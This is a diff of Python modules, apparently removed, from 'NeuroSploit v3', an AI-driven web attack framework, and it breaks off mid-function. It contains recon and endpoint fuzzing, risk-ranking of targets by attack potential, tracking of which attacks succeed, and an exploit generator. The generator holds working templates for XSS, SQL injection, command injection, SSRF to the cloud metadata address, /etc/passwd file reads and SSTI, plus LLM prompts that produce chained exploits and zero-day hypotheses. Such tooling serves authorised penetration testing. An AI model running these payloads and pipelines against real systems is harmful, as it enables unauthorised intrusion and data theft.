# Try common resources under each API base
for resource in COMMON_RESOURCES:
if resource not in api_resources:
inferred.add(f"{target_origin}{base}/{resource}")
# Try CRUD variants for known resources
for resource in api_resources:
for suffix in CRUD_SUFFIXES:
inferred.add(f"{target_origin}{base}/{resource}{suffix}")
# Remove already-known endpoints
known_normalized = {_normalize_url(ep) for ep in known_endpoints}
inferred = {url for url in inferred if _normalize_url(url) not in known_normalized}
# Batch check (parallel, capped)
to_check = sorted(inferred)[:100]
check_tasks = [self._check_url_alive(url) for url in to_check]
results = await asyncio.gather(*check_tasks, return_exceptions=True)
discovered = []
for url, alive in zip(to_check, results):
if alive is True:
discovered.append(EndpointInfo(
url=url, method="GET", source="api_fuzzing", priority=6,
))
logger.info(f"[DeepRecon] API fuzzing: {len(discovered)}/{len(to_check)} alive")
return discovered
# ------------------------------------------------------------------
# Multi-method discovery
# ------------------------------------------------------------------
async def discover_methods(
self, target: str, endpoints: List[str], sample_size: int = 20
) -> Dict[str, List[str]]:
"""Test which HTTP methods each endpoint accepts (OPTIONS + probing)."""
results: Dict[str, List[str]] = {}
sampled = endpoints[:sample_size]
async def _check_options(url: str) -> Tuple[str, List[str]]:
try:
session = await self._get_session()
async with session.options(
url, ssl=False, timeout=aiohttp.ClientTimeout(total=5)
) as resp:
allow = resp.headers.get("Allow", "")
if allow:
return url, [m.strip().upper() for m in allow.split(",")]
# Also check Access-Control-Allow-Methods
cors = resp.headers.get("Access-Control-Allow-Methods", "")
if cors:
return url, [m.strip().upper() for m in cors.split(",")]
except Exception:
pass
return url, []
tasks = [_check_options(url) for url in sampled]
responses = await asyncio.gather(*tasks, return_exceptions=True)
for resp in responses:
if isinstance(resp, tuple):
url, methods = resp
if methods:
results[url] = methods
return results
# ------------------------------------------------------------------
# Deep technology fingerprinting
# ------------------------------------------------------------------
_FINGERPRINT_FILES = [
"/readme.txt", "/README.md", "/CHANGELOG.md", "/CHANGES.txt",
"/package.json", "/composer.json", "/Gemfile.lock",
"/requirements.txt", "/go.mod", "/pom.xml", "/build.gradle",
]
_WP_PROBES = [
"/wp-links-opml.php",
"/wp-includes/js/wp-embed.min.js",
]
_DRUPAL_PROBES = [
"/CHANGELOG.txt",
"/core/CHANGELOG.txt",
]
RE_VERSION = re.compile(r'["\']?version["\']?\s*[:=]\s*["\']?(\d+\.\d+[\w.\-]*)')
RE_WP_VER = re.compile(r'ver=(\d+\.\d+[\w.\-]*)')
RE_DRUPAL_VER = re.compile(r'Drupal\s+(\d+\.\d+[\w.\-]*)')
async def deep_fingerprint(
self, target: str, headers: Dict, body: str
) -> List[Dict]:
"""Detect software and versions from well-known files and probes."""
target = target.rstrip("/")
results: List[Dict] = []
seen: set = set()
def _add(software: str, version: str, source: str):
key = (software.lower(), version)
if key not in seen:
seen.add(key)
results.append({"software": software, "version": version, "source": source})
# Generic version files
tasks = {path: self._fetch(f"{target}{path}") for path in self._FINGERPRINT_FILES}
bodies = dict(zip(tasks.keys(), await asyncio.gather(*tasks.values(), return_exceptions=True)))
for path, content in bodies.items():
if not isinstance(content, str):
continue
if path.endswith(".json"):
try:
doc = json.loads(content)
name = doc.get("name", "unknown")
ver = doc.get("version", "")
if ver:
_add(name, ver, path)
except (json.JSONDecodeError, ValueError):
pass
elif path == "/go.mod":
m = re.search(r'^module\s+(\S+)', content, re.MULTILINE)
if m:
_add(m.group(1), "go-module", path)
for dep_m in re.finditer(r'^\s+(\S+)\s+(v[\d.]+)', content, re.MULTILINE):
_add(dep_m.group(1), dep_m.group(2), path)
elif path == "/requirements.txt":
for dep_m in re.finditer(r'^([a-zA-Z0-9_\-]+)==([\d.]+)', content, re.MULTILINE):
_add(dep_m.group(1), dep_m.group(2), path)
elif path == "/Gemfile.lock":
for dep_m in re.finditer(r'^\s{4}([a-z_\-]+)\s+\(([\d.]+)\)', content, re.MULTILINE):
_add(dep_m.group(1), dep_m.group(2), path)
else:
m = self.RE_VERSION.search(content)
if m:
_add("unknown", m.group(1), path)
# WordPress probes
for wp_path in self._WP_PROBES:
content = await self._fetch(f"{target}{wp_path}")
if not content:
continue
m = self.RE_WP_VER.search(content)
if m:
_add("WordPress", m.group(1), wp_path)
elif "WordPress" in content or "wp-" in content:
_add("WordPress", "unknown", wp_path)
# Drupal probes
for dp_path in self._DRUPAL_PROBES:
content = await self._fetch(f"{target}{dp_path}")
if not content:
continue
m = self.RE_DRUPAL_VER.search(content)
if m:
_add("Drupal", m.group(1), dp_path)
return results
# ------------------------------------------------------------------
# Comprehensive recon pipeline
# ------------------------------------------------------------------
async def full_recon(
self, target: str, technologies: List[str],
js_urls: List[str], known_endpoints: List[str],
) -> Dict:
"""Run ALL recon phases and return aggregated results."""
results: Dict = {
"sitemap_urls": [],
"robots_paths": [],
"js_analysis": None,
"api_schema": None,
"framework_endpoints": [],
"fuzzed_endpoints": [],
"method_map": {},
"fingerprints": [],
"all_endpoints": [],
}
# Run independent phases in parallel
sitemap_task = self.parse_sitemap(target)
robots_task = self.parse_robots(target)
js_task = self.crawl_js_files(target, js_urls) if js_urls else asyncio.sleep(0)
api_task = self.enumerate_api(target, technologies)
fw_task = self.discover_framework_endpoints(target, technologies)
sitemap_result, robots_result, js_result, api_result, fw_result = \
await asyncio.gather(sitemap_task, robots_task, js_task, api_task, fw_task,
return_exceptions=True)
if isinstance(sitemap_result, list):
results["sitemap_urls"] = sitemap_result
if isinstance(robots_result, tuple):
results["robots_paths"] = robots_result[0]
if isinstance(js_result, JSAnalysisResult):
results["js_analysis"] = js_result
if isinstance(api_result, APISchema):
results["api_schema"] = api_result
if isinstance(fw_result, list):
results["framework_endpoints"] = fw_result
# Aggregate all discovered endpoints
all_eps = set(known_endpoints)
all_eps.update(results["sitemap_urls"])
all_eps.update(results["robots_paths"])
if results["js_analysis"]:
all_eps.update(results["js_analysis"].endpoints)
if results["api_schema"]:
for ep in results["api_schema"].endpoints:
url = ep.get("url", "")
if url.startswith("/"):
all_eps.add(urljoin(target, url))
elif url.startswith("http"):
all_eps.add(url)
for fw_ep in results["framework_endpoints"]:
all_eps.add(fw_ep.url)
# Now run API fuzzing with ALL known endpoints
try:
fuzzed = await self.fuzz_api_patterns(target, sorted(all_eps))
if isinstance(fuzzed, list):
results["fuzzed_endpoints"] = fuzzed
for ep in fuzzed:
all_eps.add(ep.url)
except Exception as e:
logger.warning(f"[DeepRecon] API fuzzing error: {e}")
# Discover methods for a sample
try:
methods = await self.discover_methods(target, sorted(all_eps))
results["method_map"] = methods
except Exception as e:
logger.warning(f"[DeepRecon] Method discovery error: {e}")
results["all_endpoints"] = sorted(all_eps)[:MAX_ENDPOINTS]
logger.info(f"[DeepRecon] Total endpoints discovered: {len(results['all_endpoints'])}")
return results
@@ -1,270 +0,0 @@
"""
NeuroSploit v3 - Endpoint Classifier
Classifies endpoints by function type (auth, upload, api, admin, etc.)
and assigns risk scores + priority vulnerability types for targeted testing.
Replaces linear endpoint iteration with risk-ranked testing order.
"""
import re
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, parse_qs
logger = logging.getLogger(__name__)
@dataclass
class EndpointProfile:
"""Classification result for a single endpoint."""
url: str
endpoint_type: str # "auth", "upload", "api", "admin", "search", "data", "static", "generic"
risk_score: float # 0.0 - 1.0
priority_vulns: List[str] = field(default_factory=list)
method: str = "GET"
params: List[str] = field(default_factory=list)
has_auth_indicators: bool = False
has_file_handling: bool = False
has_user_input: bool = False
tech_hints: List[str] = field(default_factory=list)
class EndpointClassifier:
"""Classifies endpoints by function and assigns risk scores.
Instead of testing all endpoints equally, this module ranks them
by type and attack potential, directing more testing effort at
high-value targets (admin panels, auth endpoints, file uploads).
"""
ENDPOINT_TYPES = {
"auth": {
"indicators": [
"/login", "/auth", "/signin", "/sign-in", "/register",
"/signup", "/sign-up", "/password", "/forgot", "/reset",
"/logout", "/signout", "/sign-out", "/oauth", "/sso",
"/token", "/session", "/2fa", "/mfa", "/verify",
"/activate", "/confirm", "/callback",
],
"priority_vulns": [
"auth_bypass", "brute_force", "weak_password",
"credential_stuffing", "session_fixation",
"jwt_manipulation", "broken_authentication",
],
"risk_weight": 0.90,
},
"upload": {
"indicators": [
"/upload", "/file", "/import", "/attachment", "/media",
"/image", "/avatar", "/photo", "/document", "/asset",
"/resource", "/blob", "/storage",
],
"priority_vulns": [
"file_upload", "xxe", "path_traversal",
"arbitrary_file_read", "rfi", "command_injection",
],
"risk_weight": 0.85,
},
"admin": {
"indicators": [
"/admin", "/manage", "/dashboard", "/panel", "/console",
"/control", "/backend", "/cms", "/wp-admin", "/administrator",
"/phpmyadmin", "/cpanel", "/webadmin", "/sysadmin",
"/management", "/internal", "/debug", "/monitoring",
],
"priority_vulns": [
"auth_bypass", "privilege_escalation", "default_credentials",
"exposed_admin_panel", "idor", "bfla",
],
"risk_weight": 0.95,
},
"api": {
"indicators": [
"/api/", "/v1/", "/v2/", "/v3/", "/graphql", "/rest/",
"/json", "/xml", "/soap", "/rpc", "/grpc", "/webhook",
"/ws/", "/websocket",
],
"priority_vulns": [
"idor", "bola", "bfla", "jwt_manipulation",
"mass_assignment", "sqli_error", "nosql_injection",
"api_rate_limiting", "broken_authentication",
],
"risk_weight": 0.80,
},
"search": {
"indicators": [
"/search", "/query", "/find", "/lookup", "/filter",
"/browse", "/explore", "/autocomplete", "/suggest",
],
"param_indicators": ["q", "query", "search", "keyword", "s", "term"],
"priority_vulns": [
"sqli_error", "sqli_blind", "xss_reflected",
"nosql_injection", "ssti", "xss_stored",
],
"risk_weight": 0.75,
},
"data": {
"indicators": [
"/users", "/accounts", "/orders", "/profile", "/settings",
"/preferences", "/billing", "/payment", "/invoice",
"/transaction", "/subscription", "/notification",
"/message", "/comment", "/post", "/article",
],
"priority_vulns": [
"idor", "bola", "mass_assignment",
"data_exposure", "information_disclosure",
"privilege_escalation",
],
"risk_weight": 0.75,
},
"redirect": {
"indicators": [
"/redirect", "/goto", "/out", "/external", "/link",
"/url", "/forward", "/return", "/next", "/continue",
],
"param_indicators": ["url", "redirect", "next", "return", "goto", "dest"],
"priority_vulns": [
"open_redirect", "ssrf", "ssrf_cloud",
],
"risk_weight": 0.70,
},
"download": {
"indicators": [
"/download", "/export", "/report", "/generate",
"/pdf", "/csv", "/xlsx", "/print",
],
"priority_vulns": [
"lfi", "path_traversal", "arbitrary_file_read",
"ssrf", "command_injection", "ssti",
],
"risk_weight": 0.80,
},
}
# Response header indicators for tech detection
TECH_INDICATORS = {
"php": ["x-powered-by: php", ".php", "phpsessid"],
"asp": ["x-powered-by: asp", "x-aspnet-version", ".aspx", ".asp"],
"java": ["x-powered-by: servlet", "jsessionid", ".jsp", ".do", ".action"],
"python": ["x-powered-by: flask", "x-powered-by: django", "csrftoken"],
"node": ["x-powered-by: express", "connect.sid"],
"ruby": ["x-powered-by: phusion", "_session_id", ".rb"],
"wordpress": ["wp-", "wordpress", "wp-content", "wp-json"],
"drupal": ["drupal", "sites/default"],
"joomla": ["joomla", "administrator/index.php"],
}
def classify(self, url: str, method: str = "GET",
params: List[str] = None,
response_headers: Dict = None) -> EndpointProfile:
"""Classify a single endpoint and return its profile."""
parsed = urlparse(url)
path = parsed.path.lower()
params = params or list(parse_qs(parsed.query).keys())
best_type = "generic"
best_score = 0.30
best_vulns = ["xss_reflected", "sqli_error"]
for etype, config in self.ENDPOINT_TYPES.items():
score = 0.0
# Path-based matching
for indicator in config["indicators"]:
if indicator in path:
score = max(score, config["risk_weight"])
break
# Parameter-based matching
param_indicators = config.get("param_indicators", [])
if params and param_indicators:
for p in params:
if p.lower() in param_indicators:
score = max(score, config["risk_weight"] * 0.9)
break
if score > best_score:
best_score = score
best_type = etype
best_vulns = list(config["priority_vulns"])
# Boost for dangerous methods
if method in ("POST", "PUT", "PATCH", "DELETE"):
best_score = min(1.0, best_score + 0.05)
# Boost for parameters (more params = more attack surface)
if params:
param_boost = min(0.10, len(params) * 0.02)
best_score = min(1.0, best_score + param_boost)
# Detect tech hints from headers
tech_hints = []
if response_headers:
header_str = str(response_headers).lower()
for tech, indicators in self.TECH_INDICATORS.items():
if any(ind in header_str for ind in indicators):
tech_hints.append(tech)
return EndpointProfile(
url=url,
endpoint_type=best_type,
risk_score=round(best_score, 2),
priority_vulns=best_vulns,
method=method,
params=params or [],
has_auth_indicators=best_type == "auth",
has_file_handling=best_type in ("upload", "download"),
has_user_input=best_type in ("search", "data", "api"),
tech_hints=tech_hints,
)
def rank_endpoints(self, endpoints: List[Dict]) -> List[Tuple[Dict, float]]:
"""Rank a list of endpoints by risk score.
Args:
endpoints: List of dicts with at minimum 'url' key,
optionally 'method', 'params', 'headers'.
Returns:
List of (endpoint_dict, risk_score) sorted by risk descending.
"""
ranked = []
for ep in endpoints:
url = ep.get("url", ep.get("endpoint", ""))
method = ep.get("method", "GET")
params = ep.get("params", [])
headers = ep.get("headers", ep.get("response_headers", {}))
profile = self.classify(url, method, params, headers)
ep["_profile"] = profile
ranked.append((ep, profile.risk_score))
ranked.sort(key=lambda x: x[1], reverse=True)
return ranked
def get_endpoint_vuln_priorities(self, url: str, method: str = "GET",
params: List[str] = None) -> List[str]:
"""Return vuln types most likely to succeed on this endpoint."""
profile = self.classify(url, method, params)
return profile.priority_vulns
def get_high_risk_endpoints(self, endpoints: List[Dict],
threshold: float = 0.7) -> List[Dict]:
"""Filter endpoints to only high-risk ones."""
ranked = self.rank_endpoints(endpoints)
return [ep for ep, score in ranked if score >= threshold]
def get_endpoint_test_budget(self, risk_score: float,
base_types: int = 5) -> int:
"""Return how many vuln types to test based on risk score.
High-risk endpoints get more testing effort.
"""
if risk_score >= 0.90:
return base_types * 3 # 15 types for admin/auth
elif risk_score >= 0.80:
return base_types * 2 # 10 types for api/upload
elif risk_score >= 0.70:
return int(base_types * 1.5) # 7 types for search/data
return base_types # 5 types for generic
@@ -1,159 +0,0 @@
"""
NeuroSploit v3 - Execution History
Tracks attack success/failure patterns across scans to learn what works.
Records technology-to-vulnerability-type mappings with success rates.
Used by the AI to prioritize tests based on historical data.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
from collections import defaultdict
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
class ExecutionHistory:
"""Tracks which attacks work against which technologies across scans."""
MAX_ATTACKS = 500 # Keep last N attack records
def __init__(self, history_file: str = "data/execution_history.json"):
self.history_file = Path(history_file)
self._attacks: List[Dict] = []
# tech_lower -> vuln_type -> {"success": int, "fail": int}
self._tech_success: Dict[str, Dict[str, Dict[str, int]]] = {}
self._dirty = False
self._load()
def _load(self):
"""Load execution history from disk."""
if not self.history_file.exists():
return
try:
data = json.loads(self.history_file.read_text())
self._attacks = data.get("attacks", [])
for tech, vulns in data.get("tech_success", {}).items():
self._tech_success[tech] = {}
for vuln, counts in vulns.items():
self._tech_success[tech][vuln] = {
"success": counts.get("success", 0),
"fail": counts.get("fail", 0),
}
logger.info(f"Loaded execution history: {len(self._attacks)} attacks, "
f"{len(self._tech_success)} technologies tracked")
except Exception as e:
logger.warning(f"Failed to load execution history: {e}")
def _save(self):
"""Persist execution history to disk."""
try:
self.history_file.parent.mkdir(parents=True, exist_ok=True)
self.history_file.write_text(json.dumps({
"attacks": self._attacks[-self.MAX_ATTACKS:],
"tech_success": self._tech_success,
"saved_at": datetime.utcnow().isoformat(),
}, indent=2, default=str))
self._dirty = False
except Exception as e:
logger.warning(f"Failed to save execution history: {e}")
def record(self, tech_stack: List[str], vuln_type: str,
target: str, success: bool, evidence: str = ""):
"""Record an attack attempt result."""
if not vuln_type:
return
# Record the individual attack
try:
domain = urlparse(target).netloc if target else ""
except Exception:
domain = ""
self._attacks.append({
"tech": [t[:50] for t in tech_stack[:5]],
"vuln_type": vuln_type,
"target_domain": domain,
"success": success,
"evidence_preview": (evidence or "")[:100],
"timestamp": datetime.utcnow().isoformat(),
})
# Update aggregated tech_success counters
key = "success" if success else "fail"
for tech in tech_stack[:5]:
tech_lower = tech.lower().strip()
if not tech_lower:
continue
if tech_lower not in self._tech_success:
self._tech_success[tech_lower] = {}
if vuln_type not in self._tech_success[tech_lower]:
self._tech_success[tech_lower][vuln_type] = {"success": 0, "fail": 0}
self._tech_success[tech_lower][vuln_type][key] += 1
# Auto-save periodically (every 20 records)
self._dirty = True
if len(self._attacks) % 20 == 0:
self._save()
def flush(self):
"""Force save if there are unsaved changes."""
if self._dirty:
self._save()
def get_priority_types(self, tech_stack: List[str], top_n: int = 15) -> List[str]:
"""Get vuln types most likely to succeed based on tech stack history."""
scores: Dict[str, float] = defaultdict(float)
for tech in tech_stack:
tech_lower = tech.lower().strip()
if tech_lower not in self._tech_success:
continue
for vuln_type, counts in self._tech_success[tech_lower].items():
total = counts.get("success", 0) + counts.get("fail", 0)
if total < 2:
continue # Need at least 2 data points
rate = counts.get("success", 0) / total
# Weight by both success rate and volume
scores[vuln_type] += rate * total
sorted_types = sorted(scores.items(), key=lambda x: x[1], reverse=True)
return [t[0] for t in sorted_types[:top_n]]
def get_stats_for_prompt(self, tech_stack: List[str]) -> str:
"""Format execution history as context for AI prompts."""
lines = []
for tech in tech_stack[:5]:
tech_lower = tech.lower().strip()
if tech_lower not in self._tech_success:
continue
vulns = self._tech_success[tech_lower]
top = sorted(
vulns.items(),
key=lambda x: x[1].get("success", 0),
reverse=True
)[:5]
if top:
entries = []
for v, c in top:
s = c.get("success", 0)
total = s + c.get("fail", 0)
entries.append(f"{v}({s}/{total})")
lines.append(f" {tech}: {', '.join(entries)}")
return "\n".join(lines) if lines else " No historical data yet"
def get_total_attacks(self) -> int:
"""Get total number of recorded attacks."""
return len(self._attacks)
def get_success_rate(self) -> float:
"""Get overall success rate."""
if not self._attacks:
return 0.0
successes = sum(1 for a in self._attacks if a.get("success"))
return successes / len(self._attacks)
@@ -1,505 +0,0 @@
"""
NeuroSploit v3 - AI-Powered Exploit & PoC Generator
Context-aware exploit generation that:
1. Analyzes finding context (endpoint, params, tech stack, defenses)
2. Selects base PoC template and customizes for target
3. Adds evasion techniques if WAF detected
4. Uses AI to enhance PoC realism and effectiveness
5. Generates multiple formats (curl, Python, HTML, Burp)
6. Supports zero-day hypothesis reasoning
7. Generates chained multi-step exploits
"""
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
from urllib.parse import urlparse, urlencode, quote
@dataclass
class ExploitResult:
"""Generated exploit with metadata."""
poc_code: str = ""
format: str = "python" # python, curl, html, burp
formats: Dict[str, str] = field(default_factory=dict) # All formats
validated: bool = False
evasion_applied: bool = False
ai_enhanced: bool = False
description: str = ""
impact: str = ""
steps: List[str] = field(default_factory=list)
token_cost: int = 0
@dataclass
class ZeroDayHypothesis:
"""AI-generated hypothesis about unknown vulnerabilities."""
hypothesis: str
reasoning: str
test_cases: List[Dict] = field(default_factory=list)
confidence: float = 0.0
vuln_type: str = ""
class ExploitGenerator:
"""Generates validated, context-aware exploits and PoCs.
Replaces the basic poc_generator with AI-enhanced, multi-format,
context-aware exploit generation.
"""
# PoC templates by vulnerability type
POC_TEMPLATES = {
"xss_reflected": {
"curl": 'curl -s "{url}?{param}={payload}" | grep -i "{marker}"',
"python": '''import requests
url = "{url}"
payload = "{payload}"
params = {{"{param}": payload}}
resp = requests.get(url, params=params, allow_redirects=False)
if payload in resp.text:
print("[VULNERABLE] XSS reflected - payload executed in response")
print(f"URL: {{resp.url}}")
else:
print("[SAFE] Payload not reflected")''',
"html": '''<html>
<body>
<h2>XSS PoC - {url}</h2>
<p>Click the link below to trigger the XSS:</p>
<a href="{url}?{param}={payload_encoded}" target="_blank">Trigger XSS</a>
<h3>Automated Test:</h3>
<iframe src="{url}?{param}={payload_encoded}" width="800" height="400"></iframe>
</body>
</html>''',
},
"xss_stored": {
"python": '''import requests
# Step 1: Submit stored payload
url = "{url}"
data = {{"{param}": "{payload}"}}
resp = requests.post(url, data=data)
print(f"[1] Submission: {{resp.status_code}}")
# Step 2: Verify payload on display page
display_url = "{display_url}"
resp2 = requests.get(display_url)
if "{payload}" in resp2.text or "{marker}" in resp2.text:
print("[VULNERABLE] Stored XSS - payload persisted and rendered")
else:
print("[CHECK] Payload submitted but not found on display page")''',
},
"sqli_error": {
"curl": 'curl -s "{url}?{param}={payload}" 2>&1 | grep -iE "sql|syntax|mysql|ora-|postgres|sqlite"',
"python": '''import requests
url = "{url}"
# Test 1: Error-based detection
payloads = ["{payload}", "' OR '1'='1", "1 UNION SELECT NULL--"]
for p in payloads:
resp = requests.get(url, params={{"{param}": p}})
errors = ["sql", "syntax", "mysql", "ora-", "postgres", "sqlite", "microsoft"]
if any(e in resp.text.lower() for e in errors):
print(f"[VULNERABLE] SQL Error with payload: {{p}}")
print(f"Response snippet: {{resp.text[:300]}}")
break
else:
print("[SAFE] No SQL errors detected")''',
},
"sqli_blind": {
"python": '''import requests
import time
url = "{url}"
param = "{param}"
# Boolean-based test
true_resp = requests.get(url, params={{param: "1' AND '1'='1"}})
false_resp = requests.get(url, params={{param: "1' AND '1'='2"}})
if len(true_resp.text) != len(false_resp.text):
print("[VULNERABLE] Boolean-based blind SQLi detected")
print(f" TRUE response: {{len(true_resp.text)}} bytes")
print(f" FALSE response: {{len(false_resp.text)}} bytes")
# Time-based test
start = time.time()
time_resp = requests.get(url, params={{param: "1' AND SLEEP(3)--"}}, timeout=10)
elapsed = time.time() - start
if elapsed > 3:
print(f"[VULNERABLE] Time-based blind SQLi ({{elapsed:.1f}}s delay)")
else:
print("[SAFE] No time-based injection detected")''',
},
"command_injection": {
"curl": 'curl -s "{url}?{param}={payload}"',
"python": '''import requests
url = "{url}"
payloads = [
"{payload}",
"; id",
"| id",
"$(id)",
"`id`",
]
for p in payloads:
resp = requests.get(url, params={{"{param}": p}})
if "uid=" in resp.text or "gid=" in resp.text:
print(f"[VULNERABLE] Command injection with: {{p}}")
print(f"Output: {{resp.text[:500]}}")
break
else:
print("[SAFE] No command injection detected")''',
},
"ssrf": {
"python": '''import requests
url = "{url}"
param = "{param}"
# Test internal resources
targets = [
"http://127.0.0.1/",
"http://localhost/",
"http://169.254.169.254/latest/meta-data/",
"http://[::1]/",
"http://0.0.0.0/",
]
for target in targets:
resp = requests.get(url, params={{param: target}}, timeout=10)
if resp.status_code == 200 and len(resp.text) > 0:
if any(k in resp.text.lower() for k in ["ami-id", "instance", "root:", "localhost"]):
print(f"[VULNERABLE] SSRF to {{target}}")
print(f"Response: {{resp.text[:300]}}")
break
else:
print("[SAFE] No SSRF detected")''',
},
"lfi": {
"curl": 'curl -s "{url}?{param}=../../../../../../etc/passwd" | grep "root:"',
"python": '''import requests
url = "{url}"
param = "{param}"
traversals = [
"../../../../../../etc/passwd",
"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini",
"....//....//....//....//etc/passwd",
"/etc/passwd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
]
for t in traversals:
resp = requests.get(url, params={{param: t}})
if "root:" in resp.text or "[fonts]" in resp.text:
print(f"[VULNERABLE] LFI with: {{t}}")
print(f"Content: {{resp.text[:500]}}")
break
else:
print("[SAFE] No LFI detected")''',
},
"idor": {
"python": '''import requests
url = "{url}"
param = "{param}"
# Test with sequential IDs
responses = {{}}
for test_id in [1, 2, 3, 100, 999]:
resp = requests.get(url, params={{param: str(test_id)}})
responses[test_id] = {{
"status": resp.status_code,
"length": len(resp.text),
"has_data": resp.status_code == 200 and len(resp.text) > 100
}}
print(f" ID={{test_id}}: status={{resp.status_code}}, size={{len(resp.text)}}")
# Check if different IDs return different data (IDOR indicator)
data_ids = [k for k, v in responses.items() if v["has_data"]]
if len(data_ids) > 1:
sizes = [responses[k]["length"] for k in data_ids]
if len(set(sizes)) > 1:
print("[VULNERABLE] IDOR - Different IDs return different data")
else:
print("[CHECK] Same data for all IDs - may be public data")
else:
print("[SAFE] No unauthorized data access detected")''',
},
"ssti": {
"python": '''import requests
url = "{url}"
param = "{param}"
# Template expression tests
tests = [
("{{{{7*7}}}}", "49"),
("${{7*7}}", "49"),
("<%=7*7%>", "49"),
("{payload}", "{expected}"),
]
for expr, expected in tests:
resp = requests.get(url, params={{param: expr}})
if expected in resp.text:
print(f"[VULNERABLE] SSTI - {{expr}} evaluated to {{expected}}")
print(f"Template engine detected in response")
break
else:
print("[SAFE] No template injection detected")''',
},
}
def __init__(self, poc_generator=None):
"""Initialize with optional base poc_generator for template fallback."""
self.base_generator = poc_generator
async def generate(self, finding, recon_data=None,
llm=None, budget=None,
waf_detected: bool = False) -> ExploitResult:
"""Generate a complete, context-aware exploit for a confirmed finding."""
vuln_type = getattr(finding, "vulnerability_type", "")
endpoint = getattr(finding, "affected_endpoint", "")
param = getattr(finding, "parameter", "")
payload = getattr(finding, "payload", "")
evidence = getattr(finding, "evidence", "")
result = ExploitResult(description=f"PoC for {vuln_type} on {endpoint}")
# 1. Get base template
template = self.POC_TEMPLATES.get(vuln_type, {})
# 2. Generate all formats
context = {
"url": endpoint,
"param": param or "PARAM",
"payload": payload,
"payload_encoded": quote(payload, safe=""),
"marker": self._extract_marker(payload, vuln_type),
"display_url": endpoint, # For stored XSS
"expected": self._get_expected_output(payload, vuln_type),
}
for fmt, tmpl in template.items():
try:
result.formats[fmt] = tmpl.format(**context)
except (KeyError, IndexError):
result.formats[fmt] = tmpl
# 3. AI enhancement (if budget available)
if llm and budget and not budget.should_skip("enhancement"):
est_tokens = 1500
if budget.can_spend("enhancement", est_tokens):
enhanced = await self._ai_enhance_poc(
vuln_type, endpoint, param, payload, evidence,
result.formats.get("python", ""), llm
)
if enhanced:
result.formats["python"] = enhanced
result.ai_enhanced = True
budget.record("enhancement", est_tokens, f"poc_{vuln_type}")
result.token_cost = est_tokens
# 4. Select primary format
result.poc_code = result.formats.get("python",
result.formats.get("curl",
result.formats.get("html", "")))
# 5. Fallback to base generator
if not result.poc_code and self.base_generator:
result.poc_code = self.base_generator.generate(
vuln_type, endpoint, param, payload, evidence
)
# 6. Generate steps
result.steps = self._generate_steps(vuln_type, endpoint, param, payload)
return result
async def generate_zero_day_hypothesis(self, recon_data, findings: list,
llm, budget) -> List[ZeroDayHypothesis]:
"""AI reasoning about potential unknown vulnerabilities."""
if not llm or budget.should_skip("reasoning"):
return []
est_tokens = 3000
if not budget.can_spend("reasoning", est_tokens):
return []
findings_summary = []
for f in findings[:10]:
findings_summary.append({
"type": getattr(f, "vulnerability_type", ""),
"endpoint": getattr(f, "affected_endpoint", ""),
"param": getattr(f, "parameter", ""),
})
tech = getattr(recon_data, "technologies", []) if recon_data else []
endpoints = []
if recon_data:
for ep in getattr(recon_data, "endpoints", [])[:15]:
if isinstance(ep, dict):
endpoints.append(ep.get("url", ""))
elif isinstance(ep, str):
endpoints.append(ep)
prompt = f"""You are a senior security researcher analyzing a web application for potential zero-day vulnerabilities.
**Technology Stack:** {', '.join(tech[:10])}
**Known Endpoints:** {json.dumps(endpoints[:10])}
**Confirmed Vulnerabilities:** {json.dumps(findings_summary)}
Based on the technology stack, application behavior, and confirmed vulnerabilities, hypothesize about potential UNKNOWN vulnerabilities that standard scanners would miss.
Think about:
- Logic flaws in the application flow
- Race conditions in state-changing operations
- Deserialization issues in the detected framework
- Authentication/authorization edge cases
- Unusual parameter combinations that might trigger bugs
Respond in JSON:
{{
"hypotheses": [
{{
"hypothesis": "Description of the potential vulnerability",
"reasoning": "Why this might exist based on evidence",
"vuln_type": "closest_vuln_type",
"test_cases": [{{"method": "GET", "url": "/path", "params": {{"key": "value"}}}}],
"confidence": 0.3
}}
]
}}"""
try:
response = await llm.generate(prompt, "You are a senior security researcher.")
budget.record("reasoning", est_tokens, "zero_day_hypothesis")
match = re.search(r'\{.*\}', response, re.DOTALL)
if match:
data = json.loads(match.group())
hypotheses = []
for h in data.get("hypotheses", [])[:5]:
hypotheses.append(ZeroDayHypothesis(
hypothesis=h.get("hypothesis", ""),
reasoning=h.get("reasoning", ""),
test_cases=h.get("test_cases", []),
confidence=min(1.0, max(0.0, float(h.get("confidence", 0.2)))),
vuln_type=h.get("vuln_type", ""),
))
return hypotheses
except Exception:
pass
return []
async def generate_chained_exploit(self, chain: List, llm=None) -> str:
"""Generate exploit that chains multiple findings."""
if not chain:
return ""
steps = []
for i, finding in enumerate(chain, 1):
vtype = getattr(finding, "vulnerability_type", "unknown")
endpoint = getattr(finding, "affected_endpoint", "")
payload = getattr(finding, "payload", "")
steps.append(f"""# Step {i}: {vtype}
# Target: {endpoint}
# Payload: {payload}
print(f"[Step {i}] Exploiting {vtype} on {endpoint}")
resp_{i} = requests.get("{endpoint}", params={{"{getattr(finding, 'parameter', 'param')}": "{payload}"}})
print(f" Status: {{resp_{i}.status_code}}")
""")
return f"""import requests
# Multi-Step Exploit Chain
# Steps: {' -> '.join(getattr(f, 'vulnerability_type', '?') for f in chain)}
session = requests.Session()
{''.join(steps)}
print("[CHAIN COMPLETE] All steps executed")
"""
def format_poc(self, exploit: ExploitResult, fmt: str) -> str:
"""Get PoC in specific format."""
return exploit.formats.get(fmt, exploit.poc_code)
# ── Internal Helpers ──
async def _ai_enhance_poc(self, vuln_type: str, endpoint: str,
param: str, payload: str, evidence: str,
base_poc: str, llm) -> Optional[str]:
"""Use AI to enhance the base PoC."""
prompt = f"""Improve this PoC script to be more realistic and effective.
Vulnerability: {vuln_type}
Endpoint: {endpoint}
Parameter: {param}
Evidence: {evidence[:300]}
Current PoC:
```python
{base_poc[:1000]}
```
Requirements:
1. Add proper error handling
2. Add clear success/failure output
3. Include verification step
4. Keep it concise (max 40 lines)
Return ONLY the improved Python code, no explanation."""
try:
response = await llm.generate(prompt, "You are a security engineer writing PoC code.")
# Extract code block
code_match = re.search(r'```python\n(.*?)```', response, re.DOTALL)
if code_match:
